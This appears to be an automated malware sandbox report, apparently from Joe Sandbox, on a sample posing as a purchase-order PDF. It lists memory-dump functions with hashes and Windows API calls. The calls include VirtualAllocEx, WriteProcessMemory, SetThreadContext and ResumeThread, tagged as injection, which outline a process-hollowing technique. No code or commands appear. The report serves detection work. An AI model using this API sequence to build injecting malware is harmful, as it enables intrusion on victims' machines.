Instruction Fuzzy Hash: 6E21E2B0D046198BEB18DF9BD8457DEBAF6AFC9304F14C06AD40866264DB7509468FA0

Function 0144DEA0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0144DF1E
GetCurrentThread.KERNEL32 ref: 0144DF5B
GetCurrentProcess.KERNEL32 ref: 0144DF98
GetCurrentThreadId.KERNEL32 ref: 0144DFF1

Memory Dump Source

Source File: 00000000.00000002.1744459273.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_PO-0005082025 pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: aa139a256a64e1126b92c853ce2eea5117240271c9687f50fcac24eb6268a222
Instruction ID: b1f3100fbfacda59e55b8dd692dd907d9acc253fdba8f472f5fdfa5cd366a839
Opcode Fuzzy Hash: aa139a256a64e1126b92c853ce2eea5117240271c9687f50fcac24eb6268a222
Instruction Fuzzy Hash: 805167B09003498FEB28DFA9D948B9EBFF1EF58314F20845AE419A73A0D7345844CB65

Function 079A0784 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079A09C6

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4a247dec4278543acdcfc38061a67ab71e6bfff51f7dc6215e4fd32b2470d487
Instruction ID: ae4105c11d55850cf5868023616577aed0786a1e68d169a039f6abde4ed0b106
Opcode Fuzzy Hash: 4a247dec4278543acdcfc38061a67ab71e6bfff51f7dc6215e4fd32b2470d487
Instruction Fuzzy Hash: 83A15CB1D0121ADFDB20DFA8C845BDEBBB6FF48314F1481A9D848A7240E7759985CF91

Function 079A0790 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079A09C6

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8b3d1f7c604f0fa95c3cb979705d7d05fbebca09854ff547ed8a75c598d955d1
Instruction ID: 471df4461b42634db46776def7bf9c3e12d84a93372adfb7e50135ea58a63b44
Opcode Fuzzy Hash: 8b3d1f7c604f0fa95c3cb979705d7d05fbebca09854ff547ed8a75c598d955d1
Instruction Fuzzy Hash: 66915CB1D0121ADFEB20DFA8C845BDEBBB6FF48314F1481A9D808A7240E7759985CF91

Function 0144BBF7 Relevance: 1.7, APIs: 1, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0144BE5E

Memory Dump Source

Source File: 00000000.00000002.1744459273.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_PO-0005082025 pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7eb67e13a07b2e759a4ff06ac3e6c700ed13f05878a488793479cefff9029046
Instruction ID: 26605fd7ca635e5caaacfbdc39a196043fa3c069ebac4a8d8075c13330480e63
Opcode Fuzzy Hash: 7eb67e13a07b2e759a4ff06ac3e6c700ed13f05878a488793479cefff9029046
Instruction Fuzzy Hash: 138123B0A00B058FE725DF2AD49475ABBF1FF88304F108A6ED486D7A60DB35E845CB91

Function 0144590D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 014459C9

Memory Dump Source

Source File: 00000000.00000002.1744459273.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_PO-0005082025 pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 154c51a122caba8b3d56e6585e48de66d0edce1c74b1bda636827711a09d9e32
Instruction ID: ded2ec189e70bba338b4f64b75489d8c55dea67243370924feaa1ec428ac77dc
Opcode Fuzzy Hash: 154c51a122caba8b3d56e6585e48de66d0edce1c74b1bda636827711a09d9e32
Instruction Fuzzy Hash: 4041CEB0C00659CFDF24CFAAC984B8EBBB5BF49304F24856AD408AB255DB75694ACF50

Function 0144448C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 014459C9

Memory Dump Source

Source File: 00000000.00000002.1744459273.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_PO-0005082025 pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d7665fdd30ce22d0855b5119228930eac296ece50ff375a060603e38116c9a79
Instruction ID: 13b94061ef8486ac2ac8066f6fe3e86b8f726eb4e716b072f1ccd7cf2df61ab6
Opcode Fuzzy Hash: d7665fdd30ce22d0855b5119228930eac296ece50ff375a060603e38116c9a79
Instruction Fuzzy Hash: 0141BFB0C00759CBDF24DFA9C984B9EBBB5BF49304F24846AD408AB261DB756945CF90

Function 0581CAE8 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1755799822.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_PO-0005082025 pdf.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: e4f09765abaad57137015ca5ac5f9abb148ab2187ab68a01c274676efbba3127
Instruction ID: 96459541ad13118cad366d1437672d64bbb05d2aae5030108fb0b4fdd2ffb0b6
Opcode Fuzzy Hash: e4f09765abaad57137015ca5ac5f9abb148ab2187ab68a01c274676efbba3127
Instruction Fuzzy Hash: A3318B729043899FCB11DFA9D904AEEBFF8EF49320F14806AE954E7261C3359854DFA1

Function 07980890 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 0798091F

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: 505911ab2eb07bf67c00247774fc1f4a71be1dac858e48553b895f2166401209
Instruction ID: a1e1835824859fa0d8987589fc48d192ce2b6ac89ccff0638d6843c26fe949c2
Opcode Fuzzy Hash: 505911ab2eb07bf67c00247774fc1f4a71be1dac858e48553b895f2166401209
Instruction Fuzzy Hash: DD31A7B59002499FCB21EF9AD444BAEBFF4FB09214F10805AD855B7380C3396949CFA1

Function 079A0503 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079A0598

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d9c88a3e80e0a3e68f38a7d77ba0399a04614044ce2ea5e6a38147d18faa33fd
Instruction ID: 8c62d6fc078b31921af73c1b488ef4c84910739670e7a15885a933062772e6c1
Opcode Fuzzy Hash: d9c88a3e80e0a3e68f38a7d77ba0399a04614044ce2ea5e6a38147d18faa33fd
Instruction Fuzzy Hash: 602115B190034A9FCF10DFAAC885BDEBBF5FF48314F14842AE918A7240D7789944DBA4

Function 079A0508 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079A0598

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8babeae89f8313578f0766a2ce04be865190d2229a37eb7ce95b0510de40bbdc
Instruction ID: d51e2820d3fd840c650261f672648e0201d37a7a7193c3b9c20d6f2d141f1374
Opcode Fuzzy Hash: 8babeae89f8313578f0766a2ce04be865190d2229a37eb7ce95b0510de40bbdc
Instruction Fuzzy Hash: FA2125B19003099FCF10DFAAC885BDEBBF5FF48324F14842AE918A7240D7789944DBA0

Function 0798FE98 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0798FF1E

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 831fd8a86afed4dc42bd219e474ae870d9f8f0ded579dbd0c07c0611f4133cf1
Instruction ID: bdcd4b75db2252e5bb42d59807830660a9bf18ef5f67dc8a709ad4856b1be618
Opcode Fuzzy Hash: 831fd8a86afed4dc42bd219e474ae870d9f8f0ded579dbd0c07c0611f4133cf1
Instruction Fuzzy Hash: 732159B1D0030A8FDB10DFAAC4857AEBFF5EF58324F14842AD459A7240CB789945CFA1

Function 079A0427 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079A04B6

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f674d4f263ca63065ae7d67fecd1845454579064c2e700d215ef70e68579b5a3
Instruction ID: 211b8f78aa3a11cf361c6f9eecff96979979461f3d4634396e46cb411c5d21a0
Opcode Fuzzy Hash: f674d4f263ca63065ae7d67fecd1845454579064c2e700d215ef70e68579b5a3
Instruction Fuzzy Hash: 6921A9B18043899FCB11CFA9C845BDEBFF4EF4A314F14845AE459AB252C6399804CBA1

Function 079808A0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

MonitorFromPoint.USER32(?,?,00000002), ref: 0798091F

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID: FromMonitorPoint
String ID:
API String ID: 1566494148-0
Opcode ID: 858242b0918dbd844290400d5d55882acf306baaadceb4c250890748b850cb67
Instruction ID: f90ee2fa17749c766c0516cfde60ad5632c2a5e2fff62bceeb2a520c6a51c22a
Opcode Fuzzy Hash: 858242b0918dbd844290400d5d55882acf306baaadceb4c250890748b850cb67
Instruction Fuzzy Hash: 4D2178B49002499FDB10EF9AD409BAEBFF5FB58324F108019E959A7380C7756908CFA0

Function 079A05F3 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079A0678

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 19a52f48acc74fd6d54e4608e7d16bd8dff8c05abec53dea424f242834aa0b05
Instruction ID: 97f2937c563c1d36ef08be965f38032de1e3a9acd522ab83172790b67f0850ea
Opcode Fuzzy Hash: 19a52f48acc74fd6d54e4608e7d16bd8dff8c05abec53dea424f242834aa0b05
Instruction Fuzzy Hash: 1B212AB1D003499FCB10DF9AC881ADEFBF5FF48314F54842AE518A7250D7749544DBA5

Function 0798FEA0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0798FF1E

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c44cb23ecee4676862aa8ee3186a2284481bb43be4d7c43fe7d2d21071c8f108
Instruction ID: a8e7c0a7fb089a7c8831fb7829ee1088349c06b4ff16469cb21c935a0d72401f
Opcode Fuzzy Hash: c44cb23ecee4676862aa8ee3186a2284481bb43be4d7c43fe7d2d21071c8f108
Instruction Fuzzy Hash: FF2138B1D003098FDB10DFAAC4857EEBBF5EF58324F14842AD419A7240C7789945CFA1

Function 079A05F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079A0678

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3ffd5bd7c024de75dc90c474a888ca0ade5beb956b83070207bd6e23f57d21a3
Instruction ID: cdef7799e70bf86092c15aa366c5a899c578e46c52ffe6205f6e2e3c6d79a578
Opcode Fuzzy Hash: 3ffd5bd7c024de75dc90c474a888ca0ade5beb956b83070207bd6e23f57d21a3
Instruction Fuzzy Hash: E82139B1D003499FCB10DFAAC881ADEFBF5FF88324F10842AE518A7250D7789544DBA5

Function 0144E4F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0144E577

Memory Dump Source

Source File: 00000000.00000002.1744459273.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_PO-0005082025 pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2f8ff947f6892f649f773b28457aa339c0df06f8744f502fd2b865343e0eeb2c
Instruction ID: fba5e7fc871a8be830e646d04ae8729d352dc99bc5d3e5e8572ba696107fbfe5
Opcode Fuzzy Hash: 2f8ff947f6892f649f773b28457aa339c0df06f8744f502fd2b865343e0eeb2c
Instruction Fuzzy Hash: CF21E4B5D002099FDB10CF9AD984ADEBFF9FB48320F14841AE914A3350D378A954CFA4

Function 0581AB1C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0581CB02,?,?,?,?,?), ref: 0581CBA7

Memory Dump Source

Source File: 00000000.00000002.1755799822.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_PO-0005082025 pdf.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 5269463d7d373474c7122f9b7aa32ed65c608234834e2ed426a9c0c1918a89e8
Instruction ID: 6361f52d1a19bf6e7da25e9eb5db2f653eeb3b4787fc9b31930e3dd7dbeb7ded
Opcode Fuzzy Hash: 5269463d7d373474c7122f9b7aa32ed65c608234834e2ed426a9c0c1918a89e8
Instruction Fuzzy Hash: E91156B580024D9FDB10CFAAC944BDEBFF8EB58320F14841AE914A7210C379A954DFA5

Function 079A0448 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079A04B6

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: dabfe8a14f86322fc27f3bf60c36edf4d543939baf4d4525d1ed38449557ee8b
Instruction ID: c5317e4c83219acab55619ad17c83dd0d459e078eb5bf23cc017ddf8f3831441
Opcode Fuzzy Hash: dabfe8a14f86322fc27f3bf60c36edf4d543939baf4d4525d1ed38449557ee8b
Instruction Fuzzy Hash: F91167B18003099FCB10DFAAC845ADEBFF9FF88324F248419E519A7250C775A500DFA0

Function 0798FDE8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0798FE52

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1a7488aac36f59c68cf92a22c5dfbf6ee4f1d2c24d49f3046ef49b63b804d9ad
Instruction ID: d7e7a4c96358cfd24bf972647b71bdf27cf718f126ac4d81632169b68ecfd662
Opcode Fuzzy Hash: 1a7488aac36f59c68cf92a22c5dfbf6ee4f1d2c24d49f3046ef49b63b804d9ad
Instruction Fuzzy Hash: C11146B190034A8BCB20DFAAC44579EFFF9EF98324F24881AD519A7240CA796944CB90

Function 0798FDF0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0798FE52

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6dcb898f69244021875b3739e5fb8010ad6041f92d86487d9464f10753186ccc
Instruction ID: 7de968c21182d3f6b1e25e0d7ecf0797335c683c9b93946b8800cdaaeff5912c
Opcode Fuzzy Hash: 6dcb898f69244021875b3739e5fb8010ad6041f92d86487d9464f10753186ccc
Instruction Fuzzy Hash: A71125B1D003498FDB20DFAAC44579EFBF9AF98324F24841AD519A7240CA79A944CBA5

Function 079A016C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 079A312D

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b647779ce05654473a895b719e8643f91626fd94f40c4b1b70d2ceffb2ac383b
Instruction ID: 8e125b414b55faab92a5c76ace4036149562df05612e76c200e89490aa3f26f9
Opcode Fuzzy Hash: b647779ce05654473a895b719e8643f91626fd94f40c4b1b70d2ceffb2ac383b
Instruction Fuzzy Hash: FC11F5B58003499FCB10DF9AD945BDEBBF8EB58324F10841AE518A7600C375A944CFA5

Function 0144BDF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0144BE5E

Memory Dump Source

Source File: 00000000.00000002.1744459273.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_PO-0005082025 pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1991def00b2464fb8f5ab24f5572e86e9896f7177ad8ce5dc367ee668d9b0294
Instruction ID: 0c84e9c1eb40871dcc3e994f73969adea4410139da9109793e79119db525d510
Opcode Fuzzy Hash: 1991def00b2464fb8f5ab24f5572e86e9896f7177ad8ce5dc367ee668d9b0294
Instruction Fuzzy Hash: 4B11E3B5C002498FDB20DF9AC444ADEFBF5EF88324F24842AD919A7710C375A545CFA1

Function 079A30C8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 079A312D

Memory Dump Source

Source File: 00000000.00000002.1765579298.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79a0000_PO-0005082025 pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a5eb17a4b3d8d1a7a263811ec6f7c38c37f839d024273a893242ac2008a5cb13
Instruction ID: 6fa9f52b61f3b78d5c72d12cc38568af30890cacfea4a148baec8af7369e8445
Opcode Fuzzy Hash: a5eb17a4b3d8d1a7a263811ec6f7c38c37f839d024273a893242ac2008a5cb13
Instruction Fuzzy Hash: 351133B58003099FCB10DF9AD885BDEBBF8EB48324F20851AE828A3250D375A544CFA1

Function 013ED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743006505.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13ed000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d919cce647adf91c02732587f4ad1554c86c51a32a8dbdf9351920f6a6babb55
Instruction ID: c87e214fdefb50fff34d0edb52185241a28632e3bd6d4119fdb87f7a986fcc9b
Opcode Fuzzy Hash: d919cce647adf91c02732587f4ad1554c86c51a32a8dbdf9351920f6a6babb55
Instruction Fuzzy Hash: 56214BB1104304DFDB05DF44D5C4B56BFA5FB94318F20C56DE9091B296C736E446CBA1

Function 013ED4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743006505.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13ed000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302cd1e408c5607cd9141b8b1f407ca428f9b3c202b17935e6c992a7c454aa49
Instruction ID: 33175466374d252c8738e82cecb23cb13ba30f7f65b0de8a7bbc4f770563ef02
Opcode Fuzzy Hash: 302cd1e408c5607cd9141b8b1f407ca428f9b3c202b17935e6c992a7c454aa49
Instruction Fuzzy Hash: 7C2133B2504304DFCB05DF58C9C4B26BFA5FB8831CF20C569E9090B2D6C336D406CAA1

Function 013FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744112533.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fd000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97daf80d331e4e5787b405083c76065910fc3acb506b0e219ac8986419bcc079
Instruction ID: 84806101891d0592b5d4f53f7c573a3a871a1edf316c9bf6dd02e28a33c507a0
Opcode Fuzzy Hash: 97daf80d331e4e5787b405083c76065910fc3acb506b0e219ac8986419bcc079
Instruction Fuzzy Hash: 642134B1604205EFDB15DF58D9C8B26BF65FB84358F20C96DEA0A4B346C33AD407CA61

Function 013FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744112533.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fd000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c6a9ff93f3ee8fbda811b3c4d976cc736f123abae44add134741d71d5a46ca
Instruction ID: 227a8951ed52d9cf47c330c1202434192f4cb060ff907c86e1e254803c9e9b46
Opcode Fuzzy Hash: 47c6a9ff93f3ee8fbda811b3c4d976cc736f123abae44add134741d71d5a46ca
Instruction Fuzzy Hash: 282149B9504204FFDB05DF98D5C8B26BB65FB84328F20C56DEA094B252C336D406CBA1

Function 013FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744112533.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fd000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c620f29329e3b10ecf3d84646016f763e63592a04aa1f73a739fc54be9422b2
Instruction ID: cd938ef48c2359d4edec29358ea3363a73c52c518a37f7f2560614efb6f28a85
Opcode Fuzzy Hash: 7c620f29329e3b10ecf3d84646016f763e63592a04aa1f73a739fc54be9422b2
Instruction Fuzzy Hash: 3A2180755093808FDB13CF24D994715BF71EB46218F28C5EAD9498F6A7C33A980ACB62

Function 013ED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743006505.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13ed000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 1ec00a6c86c38a8027834789ee06749c12dedd684f69f6cff5bbedb0597827a3
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: 7B11E176404380CFCB12CF54D9C4B16BFB2FB84318F24C6AAD8090B696C33AD45ACBA1

Function 013ED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743006505.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13ed000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 6a2d46e6214b971c371ecefd128dd3e70fc524b4d4f5a1bba723c76e8c93045d
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: D311CD76404280CFDB12CF44D5C4B56BFA2FB94228F2482A9D9090A656C33AE45ACBA1

Function 013FD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744112533.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fd000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 97d03f6d9721f472ab2a1a88a77581c2ac1dd2c68b5fb0495e60900544e892b3
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 0E11BE79504240DFDB12CF54C6C4B15BB71FB84228F24C6AED9494B656C33AD44ACB91

Non-executed Functions

Function 07982D62 Relevance: 4.0, Strings: 3, Instructions: 241COMMON

Download Yara Rule

Strings

xbgq, xrefs: 07982EA0
TJiq, xrefs: 07982F16
Tedq, xrefs: 079835C7

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
